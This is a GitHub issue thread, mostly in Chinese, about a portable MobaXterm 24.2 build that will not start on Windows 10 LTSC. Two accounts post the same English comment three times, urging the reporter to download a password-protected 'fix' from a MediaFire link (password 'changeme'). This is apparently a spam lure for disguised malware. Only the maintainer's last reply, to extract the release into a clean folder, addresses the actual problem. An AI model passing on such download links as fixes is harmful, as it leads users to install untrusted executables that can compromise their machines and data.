### ISSUE TITLE
Windows 10 企业版 LTSC 打不开MobaXterm_Portable_v24.2

### ISSUE THREAD

**Issue by fanfan6** [RipplePiam/MobaXterm-Chinese-Simplified#62]
系统版本：MobaXterm_Portable_v24.2
版本号：21H2
双击[MobaXterm_Personal_24.2.exe](https://github.com/RipplePiam/MobaXterm-Chinese-Simplified/blob/main/MobaXterm_Portable_v24.2/MobaXterm_Personal_24.2.exe)后没反应。官网下载的可正常打开

v23版本可正常使用

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RipplePiam** [comment]
从Release下载压缩包，解压到一个干净的目录中，确保里面包含CygUtils.plugin 和 exe 文件，不含任何其他文件，尝试双击运行exe 文件
